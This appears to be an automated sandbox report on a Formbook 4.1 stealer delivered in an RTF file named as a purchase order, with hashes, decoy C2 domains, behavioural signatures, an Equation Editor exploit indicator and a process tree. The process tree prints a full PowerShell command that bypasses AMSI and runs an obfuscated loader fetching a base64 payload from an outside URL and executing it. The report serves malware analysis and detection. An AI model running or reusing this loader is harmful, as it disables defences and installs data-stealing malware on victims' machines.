Analysis

  • max time kernel
    151s
  • max time network
    156s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    26-01-2022 14:08

General

  • Target

    PO20220126.rtf

  • Size

    2.3MB

  • MD5

    5cd86913d2c514fac26439557709aa96

  • SHA1

    65f00339afb84c6c9e83c8a2fd4aa367d897102b

  • SHA256

    534971b14abc0d7b16338f7a1c329d044d8d9352638b9f3bb5866d5dcd1799fa

  • SHA512

    5404f7dd5fe2bb8256aa1c06968e5940a2adc2e92f5f15813155da50badfcbd0e3d7cb50947394e3b54aff61c70fa806a560328ee67d51640cf28f4fd4f51fed

Malware Config

Extracted

Family

formbook

Version

4.1

Campaign

jg17

Decoy

oekaki-fujiwara.com

artigueslm.com

bachelordegrees.xyz

sheng-hongtec.com

escaperoommetaverse.com

absolutelyfrance.com

azgotbugs.com

mega2888.com

kx3evdh.com

conectservices.xyz

laisnova.space

nonton-video.xyz

cryptocurrency.promo

detalles432.net

rajaateknik.com

dnahomelab.xyz

leguokj.com

veocap.xyz

wu8etf5443sj.xyz

diet-plan-pros.today

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • suricata: ET MALWARE FormBook CnC Checkin (GET)

    suricata: ET MALWARE FormBook CnC Checkin (GET)

  • Formbook Payload 2 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 21 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 27 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1396
    • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\PO20220126.rtf"
      2⤵
      • Drops file in Windows directory
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:740
      • C:\Windows\splwow64.exe
        C:\Windows\splwow64.exe 12288
        3⤵
          PID:1904
      • C:\Windows\SysWOW64\systray.exe
        "C:\Windows\SysWOW64\systray.exe"
        2⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1356
        • C:\Windows\SysWOW64\cmd.exe
          /c del "C:\WINDOWS\syswow64\calc.exe"
          3⤵
            PID:1552
      • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
        "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
        1⤵
        • Launches Equation Editor
        • Suspicious use of WriteProcessMemory
        PID:556
        • C:\Windows\SysWOW64\CmD.exe
          CmD.exe /C cscript %tmp%\Client.vbs A C
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1348
          • C:\Windows\SysWOW64\cscript.exe
            cscript C:\Users\Admin\AppData\Local\Temp\Client.vbs A C
            3⤵
              PID:1456
        • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
          Powershell $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*iUtils') {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like '*Context') {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1);$01512330814910881121039012501001261905802295101190001711161250=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,111,105,110,116,77,97,110,97,103,101,114,93,58,58,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,32,61,32,36,66,48,50,65,53,50,65,48,56,49,59,36,65,68,48,48,70,57,70,49,85,67,61,32,78,101,119,45,79,98,106,101,99,116,32,45,67,111,109,32,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,59,36,65,68,48,48,70,57,70,49,85,67,46,111,112,101,110,40,39,71,69,84,39,44,39,104,116,116,112,115,58,47,47,100,114,111,112,109,98,46,99,111,109,47,102,105,108,101,115,47,51,49,48,51,56,53,99,102,99,52,56,48,55,50,53,53,100,97,50,50,98,54,51,52,101,102,55,99,98,52,53,98,46,106,112,103,39,44,36,102,97,108,115,101,41,59,36,65,68,48,48,70,57,70,49,85,67,46,115,101,110,100,40,41,59,36,54,55,52,69,49,54,53,67,56,51,61,91,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,39,85,84,70,56,39,46,39,71,101,116,83,116,114,105,110,103,39,40,91,67,111,110,118,101,114,116,93,58,58,39,70,114,111,109,66,97,115,101,54,52,83,116,114,105,110,103,39,40,36,65,68,48,48,70,57,70,49,85,67,46,114,101,115,112,111,110,115,101,84,101,120,116,41,41,124,73,96,69,96,88);[System.Text.Encoding]::ASCII.GetString($01512330814910881121039012501001261905802295101190001711161250)|I`E`X
          1⤵
          • Process spawned unexpected child process
          • Blocklisted process makes network request
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1860
          • C:\WINDOWS\syswow64\calc.exe
            "{Path}"
            2⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            PID:2008

        Network

        MITRE ATT&CK Matrix ATT&CK v6

        Execution

        Exploitation for Client Execution

        1
        T1203

        Defense Evasion

        Modify Registry

        1
        T1112

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\Client.vbs
          MD5

          44f05bb1107dd792308beefc1b0ae3f7

          SHA1

          d1cd6513bd6a63985c245af8d64c8bf500206df2

          SHA256

          0d38c5d9938e4b06a20a2ee53c5c9e8af3b5921f6de7eb2fdc4c5a41c3149c7e

          SHA512

          93639e86fb07d668e6e5c46abd033ea780f2c26ba6e0e098491aacc8f98455eafe42789338f5cb522e381ec89ddbc1ed04b3d9594784bbd62d25a6149d2bbf5d

        • memory/740-56-0x0000000070861000-0x0000000070863000-memory.dmp
          Filesize

          8KB

        • memory/740-57-0x000000005FFF0000-0x0000000060000000-memory.dmp
          Filesize

          64KB

        • memory/740-58-0x00000000763B1000-0x00000000763B3000-memory.dmp
          Filesize

          8KB

        • memory/740-86-0x000000005FFF0000-0x0000000060000000-memory.dmp
          Filesize

          64KB

        • memory/740-55-0x0000000072DE1000-0x0000000072DE4000-memory.dmp
          Filesize

          12KB

        • memory/1356-84-0x00000000004E0000-0x0000000000573000-memory.dmp
          Filesize

          588KB

        • memory/1356-83-0x0000000002070000-0x0000000002373000-memory.dmp
          Filesize

          3.0MB

        • memory/1356-82-0x0000000000080000-0x00000000000AF000-memory.dmp
          Filesize

          188KB

        • memory/1356-81-0x00000000002D0000-0x00000000002D5000-memory.dmp
          Filesize

          20KB

        • memory/1396-80-0x00000000071C0000-0x00000000072B8000-memory.dmp
          Filesize

          992KB

        • memory/1396-85-0x0000000007C90000-0x0000000007DE3000-memory.dmp
          Filesize

          1.3MB

        • memory/1860-65-0x00000000028D2000-0x00000000028D4000-memory.dmp
          Filesize

          8KB

        • memory/1860-67-0x00000000028DB000-0x00000000028FA000-memory.dmp
          Filesize

          124KB

        • memory/1860-73-0x0000000002904000-0x0000000002905000-memory.dmp
          Filesize

          4KB

        • memory/1860-72-0x00000000028FF000-0x0000000002900000-memory.dmp
          Filesize

          4KB

        • memory/1860-71-0x00000000028FE000-0x00000000028FF000-memory.dmp
          Filesize

          4KB

        • memory/1860-62-0x000007FEFC241000-0x000007FEFC243000-memory.dmp
          Filesize

          8KB

        • memory/1860-64-0x00000000028D0000-0x00000000028D2000-memory.dmp
          Filesize

          8KB

        • memory/1860-66-0x00000000028D4000-0x00000000028D7000-memory.dmp
          Filesize

          12KB

        • memory/1860-63-0x000007FEF34A0000-0x000007FEF3FFD000-memory.dmp
          Filesize

          11.4MB

        • memory/1860-69-0x0000000002902000-0x0000000002904000-memory.dmp
          Filesize

          8KB

        • memory/1860-70-0x0000000002901000-0x0000000002902000-memory.dmp
          Filesize

          4KB

        • memory/2008-74-0x0000000000400000-0x000000000042F000-memory.dmp
          Filesize

          188KB

        • memory/2008-79-0x00000000001D0000-0x00000000001E4000-memory.dmp
          Filesize

          80KB

        • memory/2008-78-0x0000000000A80000-0x0000000000D83000-memory.dmp
          Filesize

          3.0MB

        • memory/2008-76-0x0000000000400000-0x000000000042F000-memory.dmp
          Filesize

          188KB

        • memory/2008-75-0x0000000000400000-0x000000000042F000-memory.dmp
          Filesize

          188KB